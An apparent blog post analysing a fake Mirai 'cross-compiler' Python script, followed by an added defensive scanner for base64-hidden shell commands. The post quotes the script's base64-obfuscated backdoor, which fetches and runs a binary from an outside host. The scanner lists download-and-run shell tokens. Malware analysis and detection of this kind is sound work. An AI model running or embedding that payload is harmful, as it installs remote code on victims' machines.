Scanning for Scanners
Recently, a malicious Python script claiming to be a “cross-compiler” for things like Mirai was brought to my attention. I decided I would look into such a thing as it seemed odd that someone would spread malware that way.
Upon analyzing the script, I came across this beautiful snippet:
    checkbinaries = "Y2QgL3RtcDsgd2dldCAtcSBodHRwOi8vc3Vja215YXNzLmdhLy54ICA7ICBjdXJsIC1PIGh0dHA6Ly9zdWNrbXlhc3MuZ2EvLnggIDtjaG1vZCAreCAueDsgbm9odXAgLi8ueCA8L2Rldi9udWxsID4vZGV2L251bGwgMj4mMTtybSAtcmYgLng="
    rebinaries = str(base64.b64decode(checkbinaries))
    run(rebinaries)

Ah yes, what a great little backdoor! Let’s see what that base64 translates to…
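One way to answer that question for any downloaded script without running it, as an added example that is not part of the original post: parse the file with `ast`, decode every base64-looking string literal, and flag those that contain shell download-and-run tokens. The indicator list, function names and the sample source (with a placeholder command and host) are constructed for illustration.

```python
import ast
import base64
import binascii
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Shell tokens typical of a download-and-execute one-liner (illustrative list).
INDICATORS = ("wget ", "curl ", "chmod +x", "nohup ", "/dev/null", "rm -rf")


def decode_candidate(text):
    """Return decoded printable text if `text` is plausible base64, else None."""
    if len(text) % 4 or not B64_RE.fullmatch(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):  # bad padding or non-text bytes
        return None
    return decoded if decoded.isprintable() else None


def scan_source(source):
    """Find base64 literals hiding shell commands; source is parsed, never run."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = decode_candidate(node.value)
            if decoded is None:
                continue
            hits = [tok.strip() for tok in INDICATORS if tok in decoded]
            if hits:
                findings.append((node.lineno, decoded, hits))
    return findings


# Constructed sample with the same shape as the snippet; placeholder payload.
_CMD = b"cd /tmp; wget -q http://example.invalid/.x; chmod +x .x"
SAMPLE = (
    "import base64\n"
    "from os import system as run\n"
    f'checkbinaries = "{base64.b64encode(_CMD).decode()}"\n'
    "rebinaries = str(base64.b64decode(checkbinaries))\n"
    "run(rebinaries)\n"
    'banner = "cross compiler v1.0 for all architectures"\n'
)

if __name__ == "__main__":
    for lineno, decoded, hits in scan_source(SAMPLE):
        print(f"line {lineno}: {hits} -> {decoded!r}")
```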